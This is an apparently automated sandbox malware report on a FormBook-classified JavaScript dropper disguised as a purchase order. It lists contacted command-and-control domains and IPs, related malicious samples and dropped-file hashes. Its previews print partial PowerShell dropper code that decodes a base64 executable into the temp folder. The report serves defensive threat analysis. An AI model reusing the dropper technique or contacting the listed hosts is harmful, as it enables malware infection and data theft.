                                                                              https://wx.longwaysun.com/app/register.php?site_id=2239&amp;topId=86884/vhr7/runonce.exe, 0000000A.00000002.3428238194.00000000055B4000.00000004.10000000.00040000.00000000.sdmp, tgV1MsdzZ4.exe, 0000000B.00000002.3426565846.0000000002A64000.00000004.00000001.00040000.00000000.sdmp, firefox.exe, 0000000D.00000002.3074572069.000000000CAF4000.00000004.80000000.00040000.00000000.sdmpfalse
                                                                                		high

                                                                                World Map of Contacted IPs

                                                                                • No. of IPs < 25%
                                                                                • 25% < No. of IPs < 50%
                                                                                • 50% < No. of IPs < 75%
                                                                                • 75% < No. of IPs

                                                                                Public IPs

                                                                                IPDomainCountryFlagASNASN NameMalicious
                                                                                103.106.67.112
                                                                                		www.seasay.xyzNew Zealand
                                                                                		56030VOYAGERNET-AS-APVoyagerInternetLtdNZfalse
                                                                                104.21.16.1
                                                                                		www.tumbetgirislinki.fitUnited States
                                                                                		13335CLOUDFLARENETUSfalse
                                                                                104.21.112.1
                                                                                		www.lucynoel6465.shopUnited States
                                                                                		13335CLOUDFLARENETUSfalse
                                                                                196.251.92.64
                                                                                		unknownSeychelles
                                                                                		327813Web4AfricaZAtrue
                                                                                162.218.30.235
                                                                                		www.l63339.xyzUnited States
                                                                                		62587ANT-CLOUDUSfalse

                                                                                General Information

                                                                                Joe Sandbox version:42.0.0 Malachite
                                                                                Analysis ID:1617723
                                                                                Start date and time:2025-02-18 08:06:22 +01:00
                                                                                Joe Sandbox product:CloudBasic
                                                                                Overall analysis duration:0h 8m 24s
                                                                                Hypervisor based Inspection enabled:false
                                                                                Report type:full
                                                                                Cookbook file name:default.jbs
                                                                                Analysis system description:Windows 10 x64 22H2 with Office Professional Plus 2019, Chrome 117, Firefox 118, Adobe Reader DC 23, Java 8 Update 381, 7zip 23.01
                                                                                Number of analysed new started processes analysed:12
                                                                                Number of new started drivers analysed:0
                                                                                Number of existing processes analysed:0
                                                                                Number of existing drivers analysed:0
                                                                                Number of injected processes analysed:2
                                                                                Technologies:
                                                                                • HCA enabled
                                                                                • EGA enabled
                                                                                • GSI enabled (Javascript)
                                                                                • AMSI enabled
                                                                                Analysis Mode:default
                                                                                Analysis stop reason:Timeout
                                                                                Sample name:PO from tpc Type 34.1 34,2 35 Spec 1.js
                                                                                Detection:MAL
                                                                                Classification:mal100.troj.spyw.expl.evad.winJS@12/8@5/5
                                                                                EGA Information:
                                                                                • Successful, ratio: 60%
                                                                                HCA Information:
                                                                                • Successful, ratio: 96%
                                                                                • Number of executed functions: 111
                                                                                • Number of non-executed functions: 270
                                                                                Cookbook Comments:
                                                                                • Found application associated with file extension: .js

                                                                                Warnings

                                                                                • Exclude process from analysis (whitelisted): dllhost.exe, WMIADAP.exe, SIHClient.exe
                                                                                • Excluded IPs from analysis (whitelisted): 13.107.246.45, 172.202.163.200
                                                                                • Excluded domains from analysis (whitelisted): client.wns.windows.com, ocsp.digicert.com, otelrules.azureedge.net, slscr.update.microsoft.com, ctldl.windowsupdate.com, fe3cr.delivery.mp.microsoft.com
                                                                                • Execution Graph export aborted for target powershell.exe, PID 6440 because it is empty
                                                                                • Execution Graph export aborted for target tgV1MsdzZ4.exe, PID 2848 because it is empty
                                                                                • Not all processes where analyzed, report is missing behavior information
                                                                                • Report creation exceeded maximum time and may have missing disassembly code information.
                                                                                • Report size getting too big, too many NtOpenKeyEx calls found.
                                                                                • Report size getting too big, too many NtProtectVirtualMemory calls found.
                                                                                • Report size getting too big, too many NtQueryValueKey calls found.
                                                                                • Some HTTP raw data packets have been limited to 10 per session. Please view the PCAPs for the complete data.

                                                                                Simulations

                                                                                Behavior and APIs

                                                                                TimeTypeDescription
                                                                                02:07:32API Interceptor6x Sleep call for process: powershell.exe modified
                                                                                02:08:56API Interceptor93x Sleep call for process: runonce.exe modified

                                                                                Joe Sandbox View / Context

                                                                                IPs

                                                                                MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                                                                103.106.67.112Revised Order Confirmation.exeGet hashmaliciousFormBookBrowse
                                                                                • www.seasay.xyz/40fw/
                                                                                LLLLLLLLASSSEERRRR.ps1Get hashmaliciousFormBookBrowse
                                                                                • www.seasay.xyz/c9ts/
                                                                                ebu.ps1Get hashmaliciousFormBookBrowse
                                                                                • www.antobloom.xyz/hzjg/
                                                                                laserl.ps1Get hashmaliciousFormBookBrowse
                                                                                • www.seasay.xyz/c9ts/?y2IHp=b2h4705j/BXuiRKtB3JtAMBCvYzPFBfMqHSZnAN25/qy/QtrNwJS7WfSSjTsExAyaJnRUVMUOnSQnGJ4mxt7UxshhdjBGkpYiovfB8EVbaaI8Ibdvw==&iLy=Wfpx
                                                                                laserrrrrrrr.ps1Get hashmaliciousFormBookBrowse
                                                                                • www.seasay.xyz/c9ts/
                                                                                DHL parcel.exeGet hashmaliciousFormBookBrowse
                                                                                • www.seasay.xyz/nje3/
                                                                                PO 87877889X,pdf.Vbs.vbsGet hashmaliciousFormBookBrowse
                                                                                • www.seasay.xyz/c9ts/
                                                                                r53YFSyurTyIZZMd.exeGet hashmaliciousFormBookBrowse
                                                                                • www.antobloom.xyz/8412/
                                                                                PURCHASE ORDER- OFFICE BUILDING SHAKHBOUT 202502.Vbs.vbsGet hashmaliciousFormBookBrowse
                                                                                • www.seasay.xyz/c9ts/
                                                                                crypt.exeGet hashmaliciousFormBookBrowse
                                                                                • www.antobloom.xyz/8412/
                                                                                104.21.16.1ebu.ps1Get hashmaliciousFormBookBrowse
                                                                                • www.fz977.xyz/48bq/
                                                                                BIS_MT103 101T000000121121.exeGet hashmaliciousFormBookBrowse
                                                                                • www.cheapwil.shop/ekxu/
                                                                                crypt.exeGet hashmaliciousFormBookBrowse
                                                                                • www.clouser.store/0izs/
                                                                                ReODK2A5DB.exeGet hashmaliciousFormBookBrowse
                                                                                • www.sigaque.today/n61y/
                                                                                xBA5hw2TjG.exeGet hashmaliciousFormBookBrowse
                                                                                • www.fz977.xyz/406r/
                                                                                jKR1K8ayHT.exeGet hashmaliciousFormBookBrowse
                                                                                • www.axis138ae.shop/do5s/
                                                                                greatnamechangedwithgoodnews.htaGet hashmaliciousCobalt Strike, FormBookBrowse
                                                                                • www.shlomi.app/r0jq/
                                                                                http://dryade.cutegreetingcakes.com/ga/click/2-263541735-21475-52792-103465-64017-800122d652-72691c1ea5Get hashmaliciousUnknownBrowse
                                                                                • dryade.cutegreetingcakes.com/ga/click/2-263541735-21475-52792-103465-64017-800122d652-72691c1ea5
                                                                                Remittance Advice 52868102.jsGet hashmaliciousFormBookBrowse
                                                                                • www.lucynoel6465.shop/jgkl/
                                                                                Payment Advice.exeGet hashmaliciousFormBookBrowse
                                                                                • www.arryongro-nambe.live/ljgq/

                                                                                Domains

                                                                                MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                                                                www.seasay.xyzRevised Order Confirmation.exeGet hashmaliciousFormBookBrowse
                                                                                • 103.106.67.112
                                                                                LLLLLLLLASSSEERRRR.ps1Get hashmaliciousFormBookBrowse
                                                                                • 103.106.67.112
                                                                                laserl.ps1Get hashmaliciousFormBookBrowse
                                                                                • 103.106.67.112
                                                                                laserrrrrrrr.ps1Get hashmaliciousFormBookBrowse
                                                                                • 103.106.67.112
                                                                                DHL parcel.exeGet hashmaliciousFormBookBrowse
                                                                                • 103.106.67.112
                                                                                PO 87877889X,pdf.Vbs.vbsGet hashmaliciousFormBookBrowse
                                                                                • 103.106.67.112
                                                                                PURCHASE ORDER- OFFICE BUILDING SHAKHBOUT 202502.Vbs.vbsGet hashmaliciousFormBookBrowse
                                                                                • 103.106.67.112
                                                                                Confirmation Receipt for ETF_20250211_HSBCEU314AX51920DEU.vbeGet hashmaliciousFormBookBrowse
                                                                                • 103.106.67.112
                                                                                Proposed Residential Building at City Walk Phase 5.vbsGet hashmaliciousFormBookBrowse
                                                                                • 103.106.67.112
                                                                                PO#910663595.exeGet hashmaliciousFormBookBrowse
                                                                                • 103.106.67.112
                                                                                www.lucynoel6465.shopQUOTATION NO REQ-19-000640.exeGet hashmaliciousFormBookBrowse
                                                                                • 104.21.48.1
                                                                                Revised Order Confirmation.exeGet hashmaliciousFormBookBrowse
                                                                                • 104.21.64.1
                                                                                SWIFT COPY.jsGet hashmaliciousFormBookBrowse
                                                                                • 104.21.112.1
                                                                                LLLLLLLLASSSEERRRR.ps1Get hashmaliciousFormBookBrowse
                                                                                • 104.21.112.1
                                                                                laserl.ps1Get hashmaliciousFormBookBrowse
                                                                                • 104.21.48.1
                                                                                laserrrrrrrr.ps1Get hashmaliciousFormBookBrowse
                                                                                • 104.21.64.1
                                                                                PO 87877889X,pdf.Vbs.vbsGet hashmaliciousFormBookBrowse
                                                                                • 104.21.64.1
                                                                                r53YFSyurTyIZZMd.exeGet hashmaliciousFormBookBrowse
                                                                                • 104.21.64.1
                                                                                DHL AWB.jsGet hashmaliciousFormBookBrowse
                                                                                • 104.21.80.1
                                                                                PURCHASE ORDER- OFFICE BUILDING SHAKHBOUT 202502.Vbs.vbsGet hashmaliciousFormBookBrowse
                                                                                • 104.21.64.1
                                                                                www.l63339.xyzLLLLLLLLASSSEERRRR.ps1Get hashmaliciousFormBookBrowse
                                                                                • 162.218.30.235
                                                                                laserl.ps1Get hashmaliciousFormBookBrowse
                                                                                • 162.218.30.235
                                                                                laserrrrrrrr.ps1Get hashmaliciousFormBookBrowse
                                                                                • 162.218.30.235
                                                                                PO 87877889X,pdf.Vbs.vbsGet hashmaliciousFormBookBrowse
                                                                                • 162.218.30.235
                                                                                DDT-5080-ST233.exeGet hashmaliciousFormBookBrowse
                                                                                • 162.218.30.235
                                                                                PURCHASE ORDER- OFFICE BUILDING SHAKHBOUT 202502.Vbs.vbsGet hashmaliciousFormBookBrowse
                                                                                • 162.218.30.235
                                                                                Proposed Residential Building at City Walk Phase 5.vbsGet hashmaliciousFormBookBrowse
                                                                                • 162.218.30.235
                                                                                I2DE5rhiJz.exeGet hashmaliciousFormBookBrowse
                                                                                • 162.218.30.235
                                                                                yQoe2Cnj0V.exeGet hashmaliciousFormBookBrowse
                                                                                • 162.218.30.235
                                                                                PO 7898777 GARDEN.jsGet hashmaliciousFormBookBrowse
                                                                                • 162.218.30.235
                                                                                www.tumbetgirislinki.fitLLLLLLLLASSSEERRRR.ps1Get hashmaliciousFormBookBrowse
                                                                                • 104.21.48.1
                                                                                laserl.ps1Get hashmaliciousFormBookBrowse
                                                                                • 104.21.112.1
                                                                                laserrrrrrrr.ps1Get hashmaliciousFormBookBrowse
                                                                                • 104.21.48.1
                                                                                PO 87877889X,pdf.Vbs.vbsGet hashmaliciousFormBookBrowse
                                                                                • 104.21.32.1
                                                                                AGODA COMPANY PTE LTD.exeGet hashmaliciousFormBookBrowse
                                                                                • 104.21.112.1
                                                                                PURCHASE ORDER- OFFICE BUILDING SHAKHBOUT 202502.Vbs.vbsGet hashmaliciousFormBookBrowse
                                                                                • 104.21.64.1
                                                                                AGODA COMPANY PTE LTD.exeGet hashmaliciousFormBookBrowse
                                                                                • 104.21.80.1
                                                                                Proposed Residential Building at City Walk Phase 5.vbsGet hashmaliciousFormBookBrowse
                                                                                • 104.21.48.1
                                                                                BJKzw4jO7c.exeGet hashmaliciousFormBookBrowse
                                                                                • 104.21.32.1
                                                                                Gd3lOevK672JYIK.zip.exeGet hashmaliciousFormBookBrowse
                                                                                • 104.21.64.1

                                                                                ASNs

                                                                                MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                                                                CLOUDFLARENETUSuseeeerrrrr.jsGet hashmaliciousSnake Keylogger, VIP KeyloggerBrowse
                                                                                • 104.21.80.1
                                                                                PO.exeGet hashmaliciousFormBookBrowse
                                                                                • 104.21.64.1
                                                                                15300429772_20250121_09114163_HesapOzeti.exeGet hashmaliciousSnake KeyloggerBrowse
                                                                                • 104.21.80.1
                                                                                Quotation.xlsGet hashmaliciousUnknownBrowse
                                                                                • 104.21.96.1
                                                                                Purchase Order.xla.xlsxGet hashmaliciousUnknownBrowse
                                                                                • 188.114.96.3
                                                                                Quotation.xlsGet hashmaliciousUnknownBrowse
                                                                                • 104.21.24.153
                                                                                Purchase Order.xla.xlsxGet hashmaliciousUnknownBrowse
                                                                                • 188.114.96.3
                                                                                Purchase Order.xla.xlsxGet hashmaliciousUnknownBrowse
                                                                                • 188.114.97.3
                                                                                Purchase Order.xla.xlsxGet hashmaliciousUnknownBrowse
                                                                                • 188.114.97.3
                                                                                file.lnkGet hashmaliciousUnknownBrowse
                                                                                • 104.16.99.29
                                                                                Web4AfricaZAboatnet.arm.elfGet hashmaliciousMiraiBrowse
                                                                                • 196.251.70.219
                                                                                inspection_draft.jsGet hashmaliciousRemcosBrowse
                                                                                • 196.251.92.64
                                                                                Purchase Order_36718933PDF.exeGet hashmaliciousXWormBrowse
                                                                                • 196.251.90.21
                                                                                SWIFT COPY.jsGet hashmaliciousFormBookBrowse
                                                                                • 196.251.92.64
                                                                                res.spc.elfGet hashmaliciousUnknownBrowse
                                                                                • 102.135.52.83
                                                                                hide.sh4.elfGet hashmaliciousUnknownBrowse
                                                                                • 196.251.67.134
                                                                                hide.m68k.elfGet hashmaliciousUnknownBrowse
                                                                                • 196.251.67.134
                                                                                hide.mpsl.elfGet hashmaliciousUnknownBrowse
                                                                                • 196.251.67.134
                                                                                hide.arm6.elfGet hashmaliciousUnknownBrowse
                                                                                • 196.251.67.134
                                                                                hide.ppc.elfGet hashmaliciousUnknownBrowse
                                                                                • 196.251.67.134
                                                                                VOYAGERNET-AS-APVoyagerInternetLtdNZRevised Order Confirmation.exeGet hashmaliciousFormBookBrowse
                                                                                • 103.106.67.112
                                                                                Hilix.x86.elfGet hashmaliciousMiraiBrowse
                                                                                • 111.65.234.221
                                                                                LLLLLLLLASSSEERRRR.ps1Get hashmaliciousFormBookBrowse
                                                                                • 103.106.67.112
                                                                                ebu.ps1Get hashmaliciousFormBookBrowse
                                                                                • 103.106.67.112
                                                                                laserl.ps1Get hashmaliciousFormBookBrowse
                                                                                • 103.106.67.112
                                                                                laserrrrrrrr.ps1Get hashmaliciousFormBookBrowse
                                                                                • 103.106.67.112
                                                                                DHL parcel.exeGet hashmaliciousFormBookBrowse
                                                                                • 103.106.67.112
                                                                                PO 87877889X,pdf.Vbs.vbsGet hashmaliciousFormBookBrowse
                                                                                • 103.106.67.112
                                                                                r53YFSyurTyIZZMd.exeGet hashmaliciousFormBookBrowse
                                                                                • 103.106.67.112
                                                                                PURCHASE ORDER- OFFICE BUILDING SHAKHBOUT 202502.Vbs.vbsGet hashmaliciousFormBookBrowse
                                                                                • 103.106.67.112
                                                                                CLOUDFLARENETUSuseeeerrrrr.jsGet hashmaliciousSnake Keylogger, VIP KeyloggerBrowse
                                                                                • 104.21.80.1
                                                                                PO.exeGet hashmaliciousFormBookBrowse
                                                                                • 104.21.64.1
                                                                                15300429772_20250121_09114163_HesapOzeti.exeGet hashmaliciousSnake KeyloggerBrowse
                                                                                • 104.21.80.1
                                                                                Quotation.xlsGet hashmaliciousUnknownBrowse
                                                                                • 104.21.96.1
                                                                                Purchase Order.xla.xlsxGet hashmaliciousUnknownBrowse
                                                                                • 188.114.96.3
                                                                                Quotation.xlsGet hashmaliciousUnknownBrowse
                                                                                • 104.21.24.153
                                                                                Purchase Order.xla.xlsxGet hashmaliciousUnknownBrowse
                                                                                • 188.114.96.3
                                                                                Purchase Order.xla.xlsxGet hashmaliciousUnknownBrowse
                                                                                • 188.114.97.3
                                                                                Purchase Order.xla.xlsxGet hashmaliciousUnknownBrowse
                                                                                • 188.114.97.3
                                                                                file.lnkGet hashmaliciousUnknownBrowse
                                                                                • 104.16.99.29

                                                                                JA3 Fingerprints

                                                                                No context

                                                                                Dropped Files

                                                                                No context

                                                                                Created / dropped Files

                                                                                C:\Temp\dddddd.ps1

                                                                                Download File
                                                                                Process:C:\Windows\System32\wscript.exe
                                                                                File Type:ASCII text, with very long lines (65494), with CRLF line terminators
                                                                                Category:dropped
                                                                                Size (bytes):550352
                                                                                Entropy (8bit):5.9755621242784
                                                                                Encrypted:false
                                                                                SSDEEP:12288:HnVu1kgZZ8qxWAmBvoCumL6fmdtaNb6EDxcTZcg7mlnyDUBolXTGS:HnVC0qxvCxgmdtwNwDUqx/
                                                                                MD5:E80F79B609EFF28E686A0C164983595D
                                                                                SHA1:D71B859F156D7359A3AD4B59DAC3733233E3B1D0
                                                                                SHA-256:29825078BF016EA67660B656455C1BA5B13E88BE362D7152D344B4369EC61A87
                                                                                SHA-512:3E148BBC8E05F9267302C546009E22F1681CCAAA83673AD1E3FEE8AECA10165CBF3B641F2E89B8D96560F5828411C745CC2152B3853085B3EA3067114B36E393
                                                                                Malicious:true
                                                                                Reputation:low
                                                                                Preview:$p=[IO.Path]::Combine($env:TEMP,"x.exe")..[IO.File]::WriteAllBytes($p,[Convert]::FromBase64String("TVqQAAMAAAAEAAAA//8AALgAAAAAAAAAQAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAgAAAAA4fug4AtAnNIbgBTM0hVGhpcyBwcm9ncmFtIGNhbm5vdCBiZSBydW4gaW4gRE9TIG1vZGUuDQ0KJAAAAAAAAABQRQAATAEDAH7Qs2cAAAAAAAAAAOAADgELATAAAEIGAABIBgAAAAAAxmAGAAAgAAAAgAYAAABAAAAgAAAAAgAABAAAAAAAAAAEAAAAAAAAAADABgAAAgAAAAAAAAIAYIUAABAAABAAAAAAEAAAEAAAAAAAABAAAAAAAAAAAAAAAGxgBgBXAAAAAKAGAJgFAAAAAAAAAAAAAAAAAAAAAAAAAIAGAAwAAACo9gUAHAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAIAAACAAAAAAAAAAAAAAACCAAAEgAAAAAAAAAAAAAAC50ZXh0AAAAzEAGAAAgAAAAQgYAAAIAAAAAAAAAAAAAAAAAACAAAGAucmVsb2MAAAwAAAAAgAYAAAIAAABEBgAAAAAAAAAAAAAAAABAAABCLnJzcmMAAACYBQAAAKAGAAAGAAAARgYAAAAAAAAAAAAAAAAAQAAAQAAAAAAAAAAAAAAAAAAAAACoYAYAAAAAAEgAAAACAAUAHPcFAFBpAAADAAAABAAABhRJAACUrQUAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAACIAKB0AAAYAKgAAAAMwCQAIAAAAAAAAAAIoEAAABgAqEzAEAE0AAAABAAARcyUAAAYKBij4AAAGJSZ9BgAABAYCfQcAAAQGA30IAAAEBgR9CQAAB

                                                                                C:\Users\user\AppData\Local\Microsoft\CLR_v4.0_32\UsageLogs\x.exe.log

                                                                                Download File
                                                                                Process:C:\Users\user\AppData\Local\Temp\x.exe
                                                                                File Type:CSV text
                                                                                Category:dropped
                                                                                Size (bytes):226
                                                                                Entropy (8bit):5.360398796477698
                                                                                Encrypted:false
                                                                                SSDEEP:6:Q3La/xw5DLIP12MUAvvR+uTL2ql2ABgTv:Q3La/KDLI4MWuPTAv
                                                                                MD5:3A8957C6382192B71471BD14359D0B12
                                                                                SHA1:71B96C965B65A051E7E7D10F61BEBD8CCBB88587
                                                                                SHA-256:282FBEFDDCFAA0A9DBDEE6E123791FC4B8CB870AE9D450E6394D2ACDA3D8F56D
                                                                                SHA-512:76C108641F682F785A97017728ED51565C4F74B61B24E190468E3A2843FCC43615C6C8ABE298750AF238D7A44E97C001E3BE427B49900432F905A7CE114AA9AD
                                                                                Malicious:false
                                                                                Reputation:high, very likely benign file
                                                                                Preview:1,"fusion","GAC",0..1,"WinRT","NotApp",1..3,"System, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_32\System\920e3d1d70447c3c10e69e6df0766568\System.ni.dll",0..

                                                                                C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\8HXJSKQQ\laser[1].ps1

                                                                                Download File
                                                                                Process:C:\Windows\System32\wscript.exe
                                                                                File Type:ASCII text, with very long lines (65494), with CRLF line terminators
                                                                                Category:dropped
                                                                                Size (bytes):550352
                                                                                Entropy (8bit):5.9755621242784
                                                                                Encrypted:false
                                                                                SSDEEP:12288:HnVu1kgZZ8qxWAmBvoCumL6fmdtaNb6EDxcTZcg7mlnyDUBolXTGS:HnVC0qxvCxgmdtwNwDUqx/
                                                                                MD5:E80F79B609EFF28E686A0C164983595D
                                                                                SHA1:D71B859F156D7359A3AD4B59DAC3733233E3B1D0
                                                                                SHA-256:29825078BF016EA67660B656455C1BA5B13E88BE362D7152D344B4369EC61A87
                                                                                SHA-512:3E148BBC8E05F9267302C546009E22F1681CCAAA83673AD1E3FEE8AECA10165CBF3B641F2E89B8D96560F5828411C745CC2152B3853085B3EA3067114B36E393
                                                                                Malicious:false
                                                                                Preview:$p=[IO.Path]::Combine($env:TEMP,"x.exe")..[IO.File]::WriteAllBytes($p,[Convert]::FromBase64String("TVqQAAMAAAAEAAAA//8AALgAAAAAAAAAQAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAgAAAAA4fug4AtAnNIbgBTM0hVGhpcyBwcm9ncmFtIGNhbm5vdCBiZSBydW4gaW4gRE9TIG1vZGUuDQ0KJAAAAAAAAABQRQAATAEDAH7Qs2cAAAAAAAAAAOAADgELATAAAEIGAABIBgAAAAAAxmAGAAAgAAAAgAYAAABAAAAgAAAAAgAABAAAAAAAAAAEAAAAAAAAAADABgAAAgAAAAAAAAIAYIUAABAAABAAAAAAEAAAEAAAAAAAABAAAAAAAAAAAAAAAGxgBgBXAAAAAKAGAJgFAAAAAAAAAAAAAAAAAAAAAAAAAIAGAAwAAACo9gUAHAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAIAAACAAAAAAAAAAAAAAACCAAAEgAAAAAAAAAAAAAAC50ZXh0AAAAzEAGAAAgAAAAQgYAAAIAAAAAAAAAAAAAAAAAACAAAGAucmVsb2MAAAwAAAAAgAYAAAIAAABEBgAAAAAAAAAAAAAAAABAAABCLnJzcmMAAACYBQAAAKAGAAAGAAAARgYAAAAAAAAAAAAAAAAAQAAAQAAAAAAAAAAAAAAAAAAAAACoYAYAAAAAAEgAAAACAAUAHPcFAFBpAAADAAAABAAABhRJAACUrQUAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAACIAKB0AAAYAKgAAAAMwCQAIAAAAAAAAAAIoEAAABgAqEzAEAE0AAAABAAARcyUAAAYKBij4AAAGJSZ9BgAABAYCfQcAAAQGA30IAAAEBgR9CQAAB

                                                                                C:\Users\user\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

                                                                                Download File
                                                                                Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                File Type:data
                                                                                Category:dropped
                                                                                Size (bytes):64
                                                                                Entropy (8bit):1.1940658735648508
                                                                                Encrypted:false
                                                                                SSDEEP:3:Nlllultnxj:NllU
                                                                                MD5:F93358E626551B46E6ED5A0A9D29BD51
                                                                                SHA1:9AECA90CCBFD1BEC2649D66DF8EBE64C13BACF03
                                                                                SHA-256:0347D1DE5FEA380ADFD61737ECD6068CB69FC466AC9C77F3056275D5FCAFDC0D
                                                                                SHA-512:D609B72F20BF726FD14D3F2EE91CCFB2A281FAD6BC88C083BFF7FCD177D2E59613E7E4E086DB73037E2B0B8702007C8F7524259D109AF64942F3E60BFCC49853
                                                                                Malicious:false
                                                                                Preview:@...e................................................@..........

                                                                                C:\Users\user\AppData\Local\Temp\6511-iOQ--

                                                                                Download File
                                                                                Process:C:\Windows\SysWOW64\runonce.exe
                                                                                File Type:SQLite 3.x database, last written using SQLite version 3042000, page size 2048, file counter 8, database pages 89, cookie 0x37, schema 4, UTF-8, version-valid-for 8
                                                                                Category:dropped
                                                                                Size (bytes):196608
                                                                                Entropy (8bit):1.1239949490932863
                                                                                Encrypted:false
                                                                                SSDEEP:384:g2qOB1nxCkvSA1LyKOMq+8iP5GDHP/0j:9q+n0E91LyKOMq+8iP5GLP/0
                                                                                MD5:271D5F995996735B01672CF227C81C17
                                                                                SHA1:7AEAACD66A59314D1CBF4016038D3A0A956BAF33
                                                                                SHA-256:9D772D093F99F296CD906B7B5483A41573E1C6BD4C91EF8DBACDA79CDF1436B4
                                                                                SHA-512:62F15B7636222CA89796FCC23FC5722657382FAAAFEDC937506CAB3286AA696609F2A5A8F479158574D9FB92D37C0AA74EA15F7A172EBF1F3D260EF6124CF8B9
                                                                                Malicious:false
                                                                                Preview:SQLite format 3......@ .......Y...........7......................................................j............W........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                                                                C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_3ygqijzd.his.psm1

                                                                                Download File
                                                                                Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                File Type:ASCII text, with no line terminators
                                                                                Category:dropped
                                                                                Size (bytes):60
                                                                                Entropy (8bit):4.038920595031593
                                                                                Encrypted:false
                                                                                SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                                                MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                                                SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                                                SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                                                SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                                                Malicious:false
                                                                                Preview:# PowerShell test file to determine AppLocker lockdown mode

                                                                                C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_w0d3smem.c0q.ps1

                                                                                Download File
                                                                                Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                File Type:ASCII text, with no line terminators
                                                                                Category:dropped
                                                                                Size (bytes):60
                                                                                Entropy (8bit):4.038920595031593
                                                                                Encrypted:false
                                                                                SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                                                MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                                                SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                                                SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                                                SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                                                Malicious:false
                                                                                Preview:# PowerShell test file to determine AppLocker lockdown mode

                                                                                C:\Users\user\AppData\Local\Temp\x.exe

                                                                                Download File
                                                                                Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                File Type:PE32 executable (GUI) Intel 80386 Mono/.Net assembly, for MS Windows
                                                                                Category:dropped
                                                                                Size (bytes):412672
                                                                                Entropy (8bit):7.9337433481569875
                                                                                Encrypted:false
                                                                                SSDEEP:12288:MsdcPrMKtAomTRRd+XMxvSKAxKz6tKW6ed:F4rMKthmT4CAxHd
                                                                                MD5:EED510D5B377CDBD8BCE6F25AD5E7EF9
                                                                                SHA1:EA611F83E1D534EF9401B49B33F4558129638B2B
                                                                                SHA-256:F29AB09093F7AAA0CE0C94EFFA2D842BA3E202DA4CE01C7AEBE848D2541E8617
                                                                                SHA-512:C0E0AF7831DC3BCA5C9F574167DB5E0B31E63883EBA1A8092A592B279ADA512E1753BC00B0B85876441F5C866018F45F70A3635A647CFC8448E6C50D5E5C4D51
                                                                                Malicious:true
                                                                                Antivirus:
                                                                                • Antivirus: Avira, Detection: 100%
                                                                                • Antivirus: ReversingLabs, Detection: 62%
                                                                                Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L...~.g..............0..B...H.......`... ........@.. ....................................`.................................l`..W.................................................................................... ............... ..H............text....@... ...B.................. ..`.reloc...............D..............@..B.rsrc................F..............@..@.................`......H...........Pi...........I..............................................".(.....*....0...........(.....*.0..M.......s%.....(....%&}......}......}......}......(*...}.....|......(...+.|....(u...*....0..E.........(1...%&(/.....B(1...%&(/...%&..[(1...%&....(....%&(J...%&...(.....*....0............(/...%&....($....+..*..0............(*....8l.....(......(....%&.(*.........,#.E.........-......& ....(1...(....z...(*...(d...%&.....(*...X(d...%&.(.......(*..........{.......(*......(*..

                                                                                Static File Info

                                                                                General

                                                                                File type:ASCII text, with very long lines (6819), with no line terminators
                                                                                Entropy (8bit):5.652552325531823
                                                                                TrID:
                                                                                  File name:PO from tpc Type 34.1 34,2 35 Spec 1.js
                                                                                  File size:6'819 bytes
                                                                                  MD5:2a7e82cc027e7b65b81697e2bdc0745f
                                                                                  SHA1:f5556a2bdb0f299ab6accae09099a9594b90bc44
                                                                                  SHA256:bef6a1f25411ce6839207cdd9c2c363c4395d8a096fda2c8ec45c5b8282b552f
                                                                                  SHA512:e541b6f1c109ad6fe06831f078c24b3802ea6606e2f919ae971477a65483f1fd6939670844bdcdb085b3bcf7e81c6642785dfe695b391ab867664008d9b70313
                                                                                  SSDEEP:192:e0Ls63uerOpRA+/Lw3N51l9uH5uOfwg4eRJ:eGNO8ALON51lcH5ZJ
                                                                                  TLSH:11E151467BE4BC5513CB4FA3992F71F9E89CA46B6E840C1BC052FD6069D8B24C8C1A71
